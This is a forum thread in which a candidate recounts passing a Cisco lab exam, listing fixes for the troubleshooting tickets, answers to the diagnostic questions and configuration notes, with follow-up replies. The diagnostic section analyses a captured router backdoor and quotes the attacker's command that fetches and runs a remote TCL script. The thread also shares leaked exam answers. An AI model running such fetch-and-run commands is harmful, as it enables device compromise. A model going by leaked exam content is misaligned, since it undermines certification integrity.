PDA

View Full Version : Cleared LAB EXAM: TS1, H3Diag, H2+CFG



orowp
10-27-2018, 11:12 AM
Passed the lab on 25-Oct. (TS1, H3Diag, H2+ Config)
Here is the feedback.

TS: TS1
=====
Ticket1: Incorrect ACL statement on SW2 for 176.16.200.0
permit 176.16.200.0
removed it and changed it to: permit 176.16.200.0 0.0.0.255

Ticket2: frame relay configured on R17. Changed it to ppp.

Ticket3: Incorrect router-id on R22. Changed it to lo0 ip of R22.

Ticket4: Passive interface on R12.

Ticket5: Didn't get 2 trace as expected
1. Network 134.21.21.21 not advertised on R21.
3. Added permit statement in prefix-list 194 on R21 for 194.1.1.1. Prefix-list was already applied in route-map with local-pref 99.
2. Trace to 134.21.21.21 and 123.3.3.3 worked as expected.
3. However trace to 8.8.8.8 and 194.1.1.1 didn't work as expected (load-balance) from R12 even when:
a. R12 received these routes from R4 and R6 and
b. ebgp neigh was up on R12 and maximum-paths 2 was pre-configured.
c. Multipaths were not getting installed.
Left this ticket as 10-15 minutes were gone in this debugging.

6.Ticket6: Ipv6 neighborship (via Ipv6 address) was activated in ipv4 address family on both routers.
Activated the Ipv6 neighbor in ipv6 address family on both routers

Ticket7:
a. Nhrp redirect missing on hub
b. ACL on R14 to block esp
c. nhrp shortcut command missing on R19.

Ticket8: Ticket required to set backup path via R8 if R7 fails. Following traced required:
a. Trace from PC104 to Server in AS of PC106
b. Trace from PC106 to 8.8.8.8
1. VLan 200 network of SW connected to PC104 not advertised in ospf --> advertised this network and PC104 got ip address from dhcp server R9.
2. ip nat inside on R8 e0/0.123
3. ospf cost 1000 on e2/0 of R4 and R6.
4. vpnv4 neighborship between R4 and R6.
Tested backup path by shutting down e1/0.123 of R3

Ticket9:
ACL on R21 not causing DMVPN to come up.
Added permit any any command in ACL on R21 to solve the issue.

Ticket10:
1. Added ip add dhcp cli id e0/0 command in e0/0 of NAS.
2. added ip domain-lookup command on R21.

Returned back to ticket 5 after completing. Reloaded R12 but no success. Left the ticket. I took 2hr 15min to solve TS as I didnt want to take risk in TS. Solved the TS carefully and checked ouptut of each ticket 2-3 times.
DONT FORGET TO SAVE THE CHANGES after output is received.


DIAG: H3
=======
Ticket 1: DHCP
1. Packet capture no: 114. (used bootp filter and selected first dhcp discovery packet)

2. What is reason ?
--> Selected this option: packet has dhcp options but relay ip in 0.0.0.0

3. Where is the packet captured?
--> Selected link between SW1-Sw3 (used cdp filter to confirm this in packet capture.

Ticket 2: TCL
First found out Router(victim) and Attacker IPs.
Filters used:
a. http.request.method==GET (source IP in GET request in Victim's IP)
b. tcp.port==1337 (Source IP in SYN packet is Victims IP)

In my case: Victim: 10.1.1.2, Attacker: 10.1.1.1

Q1: Select 4 options:
Selected these options:
1. TCP connection from router to 10.1.1.1
2. TCP connection from remote host to router's IP 10.1.1.2 on port 1337.
3. Download of script in memory via HTTP
4. Installment of ransomware via backdoor.

Q2. Select command which can cause system meltdown:
In my case answer was "r" letter (not sudo poweroff)
Method to check the command:
1. IN packet capture, ue filter tcp.port==1337
2. select first SYN packet and select option 'follow stream' in analysis tab in top right corner in cloudshark (not using right click option like wireshark :P )
3. In the stream, select flow from 10.1.1.1 to 10.1.1.2 --> multiple commands were seen (c,r,q). Note this keywords.
4. Now again changed filter in capture to http.request.method==GET and followed the tcp stream like step 2.
5. In the GET response from 10.1.1.1 to 10.1.1.2, there was a script having above keywords with description (or banner message) next to each keyword)
6. In this script, r keyword had some description like this (dont remember exact description): Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown.
7. Hence selected "r" keyword/command for second question.

Q3. Command used by attacker to run script ?
--> tclsh http://10.1.1.1/bd2.tcl
Note: name of script is bd2.tcl which can be seen in GET request packet.

DIAG section can be hectic due to less time and a lot of attachments in ach question. DOnt blindly follow the dumps. Some dumps have wrong answers. Remember the flow for each diag question and select the best logical answer.
(I took around 25 min to answer 2 questions and rechecked both questions again in last 5 min)
Diag is very important because we need to get atleast 4 out of 6 questions correct in order to score minimum passing score of 60%.
I would be very bad if we cleared TS and CFG and failed in DIAG :P


CFG: H2+
=======

Section1:
1.1: same as WB
1.2: same as WB
1.3: same as WB (PAgP required)
1.4: same as WB

After completing Sec 1, check that int vlan 911 ip of one SW is reachable from other switches (to save time i used following command on all Sw3-6: ping 255.255.255.255 rep 2)

Sec 2.1: OSPF required in DC 65002 with:
a. Type2-LSA not required.
b. vlan 100,101,911 passive on SW3 and Sw4
OSPF was configured in AS65002.
Note: vrf "Corp" present on R17 with int e0/1,lo0 and tu0 added in vrf, so configured "router ospf 1 vrf Corp" on R17.

Note: AS 65001 (core) has ospf preconfigured. Office and headquarters also had ospf configured:
1. Router ids was missing on some devices.
2. ip ospf prio was 0 on R13 e0/1. changed it to 1.
3. Ospf not configured on R9,R10 (required to do in Sec 2.7), did it in 2.1 itself.

Sec 2.2: same as WB. Did sec 3.1 before 2.2

Sec 2.3: same as WB. but required output was not mentioned. Without giving metric rib-scale command, Lo52 was not seen on other routers. Hence gave metric rib-scale 153 on all JACOBS router and R9-R10 (COnfigured eigrp on R9-R10 in 2.3 itself)

Sec 2.4:
1. Same as WB
2. Required allowas-in.
3. bgp preconfigured on CE routers but some commands were missing:
a. router-id
b. next-hop-self on 1 router
c. Lo0 of R14 advertised on R13. Removed it and advertised lo0 of R13.
(THis section takes more time as we need to check preconfiguration on many devices and add missing commands)

There is question that R11,12,13,14 send ONLY required networks: I used prefix list to permit the required 4 networks and applied it to ebgp neighborship. I felt this was logically more better choice (No WB has this solution)

Redistribution on R15, R16: It is mentioned R15,16 should send ospf default route to ther ebgp.
SO i used def info-originate instead of 'neigh x.x.x. def ori' as this command artificially generates default route even if default route is not present in RIB.
My solution was like this:
R15,16:
conf t
router ospf 1
redis bgp 65002 subnets metric-type 1 metric 1000 (used higher metric to satisfy condition of backdoor via R18-R57 in sec 2.8) (dont forget subnets keyword)

router bgp 65002
redis ospf 1 match int ext 2
default-info originate



Sec 2.5:
Question not very clear. So i followed like WB and referred Sec 3.3 for bgp requirements in Jacobs Core. Question 3.3 had:
a. PE in JACOBS should not contain AS65006
b. CE in JACOBS should not contain AS65001

Did conf like WB: removed 65006,added 65001, used no-prepend replace-as


Sec 2.6: same as WB:
R18:
router ospf 1
redistribute bgp 65002 subnets metric-type 1.

Note: R57 had redistribute eigrp command in bgp. Removed it satisfy 2.6 requiredment.


Sed 2.7: Required not to use route-map,access-list, prefix-list for redistribution.
used 'distance external' command in ospf of R9,10
Dont forget to user subnets keyword while redistributing ospf into bgp (OR networks will be distributed classful which will not cause Jacobs to reach Jamesons core networks)


Sec 2.8: Same as WB
Sec 2.9: Same as WB. Required vlan 100 to be configured passive.
Sec 2.10: Same as WB. R4 as acive and R3 as standby.
Sec 2.11: Same as WB. Spokes should not become DR.
There as point something like shortest mode on spoke --> configured ip pim vrf Corp spt-threshold infinity on all spokes.

Sec 3.1: same as WB
Sec 3.2: same as WB
mpls ip already configured on all interfaces. I enabled mpls and set router-id to lo0 on all routers.

Sec 3.3: same as WB. load-sharing on Jacobs PE

Sec 3.4:
a. Each Jamesons site should receive each others routes.
b. Each Jacobs site should receive each others routes.
c. Jamesons site should reach other Jamesons without going via DC.
d. Jacobs site should reach other Jacobs without going via DC.
e. Jamesons and Jacobs sited should communicate via DC.

--> Imported DC in all Jamesons and Jacobs
--> Imported Jamesons in each other. (not in Jacobs)
--> Imported Jacobs in each other. (not in Jamesons)


Sec 4.1: not to use deny.

Sec 4.2: same as WB.

Sec 5.1: same as WB

Sec 5.2: same as WB

Sec 5.3: Same as WB. Sw4 active. Sw3 standby
Sec 5.4: Same as WB.

I took around 5 hours to complete config section, configuring the each section steadily and checking all required outputs after completing each section.
Dont hurry in config section as it becomes difficult and time-consuming to debug in case of some fault. Remember you are not in a RACE to complete config quickly. Use notepad to copy-paste repeating configs (check IPs wile copy-pasting :P)

All the best for your LAB exams.
Go, get your NUMBER :cool:

orowp
10-27-2018, 11:14 AM
Additional Points (ran out of character limit 10000 in previous post :P) :

Exam day can create unwanted pressure. Dont lose focus and speed in exam time of 8 hours. Keep water and energy drink to maintain energy levels.

Dont blindly follow the WB.

Practice each TS,DIAG,CFG atleast 10 times.

Try to complete TS and DIAG together within 5hrs 30 min at home.

Try to begin practice at same time like exam time (start around 8:45-9AM). This will train your mind and body for exam timings. Do this for atleast 10 days before exam.

Try to avoid studying 1 day before the exam. This will increase the nervousness and increase pressure.

Go and check exam center building and its entrance gate one day before exam to avoid any last min suprises on exam day :)

When in any doubt (non-technical) during exam, immediately ask proctor rather than wasting time in solving it yourself.

Dont forget to save config on devices. as a best practice, use following commands after every config change:
end
wr

ccdp1x
10-27-2018, 06:52 PM
Great feedback.
Congrats, and enjoy your number.

proctoryon
11-01-2018, 10:28 PM
Hi,
i am preparing H2 and i have some doubts:
- in the statement, it is asked to configure between the route reflector R1 and the rest of PEs bgp neighborship using address-family ipv4. But it we configured the vrf's and mpls, i think that we should configure only the address-family vpnv4, what do you think ??
- also, to work using only address-family ipv4, it should be mandatory to use "allowas-in" on the CE's in AS65002. if we use the vpnv4, we can use as-override. what do you think ??
- is it clear on the exam ?? i am using spoto and the statement are not clear.
Thanks in advance.

ccierscisco
11-05-2018, 06:33 PM
can you share H3 Config and Gz file

orowp
11-13-2018, 06:21 AM
Hi,
i am preparing H2 and i have some doubts:
- in the statement, it is asked to configure between the route reflector R1 and the rest of PEs bgp neighborship using address-family ipv4. But it we configured the vrf's and mpls, i think that we should configure only the address-family vpnv4, what do you think ??
- also, to work using only address-family ipv4, it should be mandatory to use "allowas-in" on the CE's in AS65002. if we use the vpnv4, we can use as-override. what do you think ??
- is it clear on the exam ?? i am using spoto and the statement are not clear.
Thanks in advance.

It is clear in the exam.
Its better to configure both ipv4 and vpnv4 neighborship.

orowp
11-13-2018, 06:22 AM
can you share H3 Config and Gz file

You can find the H3 material in one of the posts in iecollection

swrong
11-29-2018, 07:37 AM
did you skip section 4.2? which is the dhcp scoop question

johnspain
12-01-2018, 09:26 AM
can you send the exact link to download it plese ??
thanks in advance

gkakade007
01-16-2019, 12:07 AM
Can you tell me what exactly you did in sec3.3, I didn't get that,
You just mentioned no-prepend replace-as

fampfamp01
03-22-2019, 04:31 PM
Grate Thanks alot

Johnsnow
09-01-2019, 01:44 AM
Passed the lab on 25-Oct. (TS1, H3Diag, H2+ Config)
Here is the feedback.

TS: TS1
=====
Ticket1: Incorrect ACL statement on SW2 for 176.16.200.0
permit 176.16.200.0
removed it and changed it to: permit 176.16.200.0 0.0.0.255

Ticket2: frame relay configured on R17. Changed it to ppp.

Ticket3: Incorrect router-id on R22. Changed it to lo0 ip of R22.

Ticket4: Passive interface on R12.

Ticket5: Didn't get 2 trace as expected
1. Network 134.21.21.21 not advertised on R21.
3. Added permit statement in prefix-list 194 on R21 for 194.1.1.1. Prefix-list was already applied in route-map with local-pref 99.
2. Trace to 134.21.21.21 and 123.3.3.3 worked as expected.
3. However trace to 8.8.8.8 and 194.1.1.1 didn't work as expected (load-balance) from R12 even when:
a. R12 received these routes from R4 and R6 and
b. ebgp neigh was up on R12 and maximum-paths 2 was pre-configured.
c. Multipaths were not getting installed.
Left this ticket as 10-15 minutes were gone in this debugging.

6.Ticket6: Ipv6 neighborship (via Ipv6 address) was activated in ipv4 address family on both routers.
Activated the Ipv6 neighbor in ipv6 address family on both routers

Ticket7:
a. Nhrp redirect missing on hub
b. ACL on R14 to block esp
c. nhrp shortcut command missing on R19.

Ticket8: Ticket required to set backup path via R8 if R7 fails. Following traced required:
a. Trace from PC104 to Server in AS of PC106
b. Trace from PC106 to 8.8.8.8
1. VLan 200 network of SW connected to PC104 not advertised in ospf --> advertised this network and PC104 got ip address from dhcp server R9.
2. ip nat inside on R8 e0/0.123
3. ospf cost 1000 on e2/0 of R4 and R6.
4. vpnv4 neighborship between R4 and R6.
Tested backup path by shutting down e1/0.123 of R3

Ticket9:
ACL on R21 not causing DMVPN to come up.
Added permit any any command in ACL on R21 to solve the issue.

Ticket10:
1. Added ip add dhcp cli id e0/0 command in e0/0 of NAS.
2. added ip domain-lookup command on R21.

Returned back to ticket 5 after completing. Reloaded R12 but no success. Left the ticket. I took 2hr 15min to solve TS as I didnt want to take risk in TS. Solved the TS carefully and checked ouptut of each ticket 2-3 times.
DONT FORGET TO SAVE THE CHANGES after output is received.


DIAG: H3
=======
Ticket 1: DHCP
1. Packet capture no: 114. (used bootp filter and selected first dhcp discovery packet)

2. What is reason ?
--> Selected this option: packet has dhcp options but relay ip in 0.0.0.0

3. Where is the packet captured?
--> Selected link between SW1-Sw3 (used cdp filter to confirm this in packet capture.

Ticket 2: TCL
First found out Router(victim) and Attacker IPs.
Filters used:
a. http.request.method==GET (source IP in GET request in Victim's IP)
b. tcp.port==1337 (Source IP in SYN packet is Victims IP)

In my case: Victim: 10.1.1.2, Attacker: 10.1.1.1

Q1: Select 4 options:
Selected these options:
1. TCP connection from router to 10.1.1.1
2. TCP connection from remote host to router's IP 10.1.1.2 on port 1337.
3. Download of script in memory via HTTP
4. Installment of ransomware via backdoor.

Q2. Select command which can cause system meltdown:
In my case answer was "r" letter (not sudo poweroff)
Method to check the command:
1. IN packet capture, ue filter tcp.port==1337
2. select first SYN packet and select option 'follow stream' in analysis tab in top right corner in cloudshark (not using right click option like wireshark :P )
3. In the stream, select flow from 10.1.1.1 to 10.1.1.2 --> multiple commands were seen (c,r,q). Note this keywords.
4. Now again changed filter in capture to http.request.method==GET and followed the tcp stream like step 2.
5. In the GET response from 10.1.1.1 to 10.1.1.2, there was a script having above keywords with description (or banner message) next to each keyword)
6. In this script, r keyword had some description like this (dont remember exact description): Your router is compromised. Pay 100 bitcoins to get back your access or be ready for meltdown.
7. Hence selected "r" keyword/command for second question.

Q3. Command used by attacker to run script ?
--> tclsh http://10.1.1.1/bd2.tcl
Note: name of script is bd2.tcl which can be seen in GET request packet.

DIAG section can be hectic due to less time and a lot of attachments in ach question. DOnt blindly follow the dumps. Some dumps have wrong answers. Remember the flow for each diag question and select the best logical answer.
(I took around 25 min to answer 2 questions and rechecked both questions again in last 5 min)
Diag is very important because we need to get atleast 4 out of 6 questions correct in order to score minimum passing score of 60%.
I would be very bad if we cleared TS and CFG and failed in DIAG :P


CFG: H2+
=======

Section1:
1.1: same as WB
1.2: same as WB
1.3: same as WB (PAgP required)
1.4: same as WB

After completing Sec 1, check that int vlan 911 ip of one SW is reachable from other switches (to save time i used following command on all Sw3-6: ping 255.255.255.255 rep 2)

Sec 2.1: OSPF required in DC 65002 with:
a. Type2-LSA not required.
b. vlan 100,101,911 passive on SW3 and Sw4
OSPF was configured in AS65002.
Note: vrf "Corp" present on R17 with int e0/1,lo0 and tu0 added in vrf, so configured "router ospf 1 vrf Corp" on R17.

Note: AS 65001 (core) has ospf preconfigured. Office and headquarters also had ospf configured:
1. Router ids was missing on some devices.
2. ip ospf prio was 0 on R13 e0/1. changed it to 1.
3. Ospf not configured on R9,R10 (required to do in Sec 2.7), did it in 2.1 itself.

Sec 2.2: same as WB. Did sec 3.1 before 2.2

Sec 2.3: same as WB. but required output was not mentioned. Without giving metric rib-scale command, Lo52 was not seen on other routers. Hence gave metric rib-scale 153 on all JACOBS router and R9-R10 (COnfigured eigrp on R9-R10 in 2.3 itself)

Sec 2.4:
1. Same as WB
2. Required allowas-in.
3. bgp preconfigured on CE routers but some commands were missing:
a. router-id
b. next-hop-self on 1 router
c. Lo0 of R14 advertised on R13. Removed it and advertised lo0 of R13.
(THis section takes more time as we need to check preconfiguration on many devices and add missing commands)

There is question that R11,12,13,14 send ONLY required networks: I used prefix list to permit the required 4 networks and applied it to ebgp neighborship. I felt this was logically more better choice (No WB has this solution)

Redistribution on R15, R16: It is mentioned R15,16 should send ospf default route to ther ebgp.
SO i used def info-originate instead of 'neigh x.x.x. def ori' as this command artificially generates default route even if default route is not present in RIB.
My solution was like this:
R15,16:
conf t
router ospf 1
redis bgp 65002 subnets metric-type 1 metric 1000 (used higher metric to satisfy condition of backdoor via R18-R57 in sec 2.8) (dont forget subnets keyword)

router bgp 65002
redis ospf 1 match int ext 2
default-info originate



Sec 2.5:
Question not very clear. So i followed like WB and referred Sec 3.3 for bgp requirements in Jacobs Core. Question 3.3 had:
a. PE in JACOBS should not contain AS65006
b. CE in JACOBS should not contain AS65001

Did conf like WB: removed 65006,added 65001, used no-prepend replace-as


Sec 2.6: same as WB:
R18:
router ospf 1
redistribute bgp 65002 subnets metric-type 1.

Note: R57 had redistribute eigrp command in bgp. Removed it satisfy 2.6 requiredment.


Sed 2.7: Required not to use route-map,access-list, prefix-list for redistribution.
used 'distance external' command in ospf of R9,10
Dont forget to user subnets keyword while redistributing ospf into bgp (OR networks will be distributed classful which will not cause Jacobs to reach Jamesons core networks)


Sec 2.8: Same as WB
Sec 2.9: Same as WB. Required vlan 100 to be configured passive.
Sec 2.10: Same as WB. R4 as acive and R3 as standby.
Sec 2.11: Same as WB. Spokes should not become DR.
There as point something like shortest mode on spoke --> configured ip pim vrf Corp spt-threshold infinity on all spokes.

Sec 3.1: same as WB
Sec 3.2: same as WB
mpls ip already configured on all interfaces. I enabled mpls and set router-id to lo0 on all routers.

Sec 3.3: same as WB. load-sharing on Jacobs PE

Sec 3.4:
a. Each Jamesons site should receive each others routes.
b. Each Jacobs site should receive each others routes.
c. Jamesons site should reach other Jamesons without going via DC.
d. Jacobs site should reach other Jacobs without going via DC.
e. Jamesons and Jacobs sited should communicate via DC.

--> Imported DC in all Jamesons and Jacobs
--> Imported Jamesons in each other. (not in Jacobs)
--> Imported Jacobs in each other. (not in Jamesons)


Sec 4.1: not to use deny.

Sec 4.2: same as WB.

Sec 5.1: same as WB

Sec 5.2: same as WB

Sec 5.3: Same as WB. Sw4 active. Sw3 standby
Sec 5.4: Same as WB.

I took around 5 hours to complete config section, configuring the each section steadily and checking all required outputs after completing each section.
Dont hurry in config section as it becomes difficult and time-consuming to debug in case of some fault. Remember you are not in a RACE to complete config quickly. Use notepad to copy-paste repeating configs (check IPs wile copy-pasting :P)

All the best for your LAB exams.
Go, get your NUMBER :cool:

Thanks bro, you explained very well and finally i found my answer about Diag 3 TCL on your post. I think there is a typo though "b. tcp.port==1337 (Source IP in SYN packet is Victims IP)" -> I think Destination is Victim per what you had described.

Johnsnow
09-02-2019, 06:03 AM
Can you tell me what exactly you did in sec3.3, I didn't get that,
You just mentioned no-prepend replace-as

if AS number 65001 should not be in as path on R55 , R56 and R57 then use command
neighbor x.x.x.x local-as 65006 no-prepend replace-as on router R50 , R51 , R52 in bgp configuration so you will see :

*> 10.16.1.0/24 172.18.253.1 0 65006 65002 ?
*> 10.16.2.0/24 172.18.253.1 0 65006 65002 ?
*> 10.16.3.0/24 172.18.253.1 0 65006 65002 ?
*> 10.100.0.1/32 172.18.253.1 0 65006 65002 ?
*> 10.100.0.19/32 172.18.253.1 0 65006 65002 ?
...
Otherwise you'll see 65006 65001 65002
I hope it helps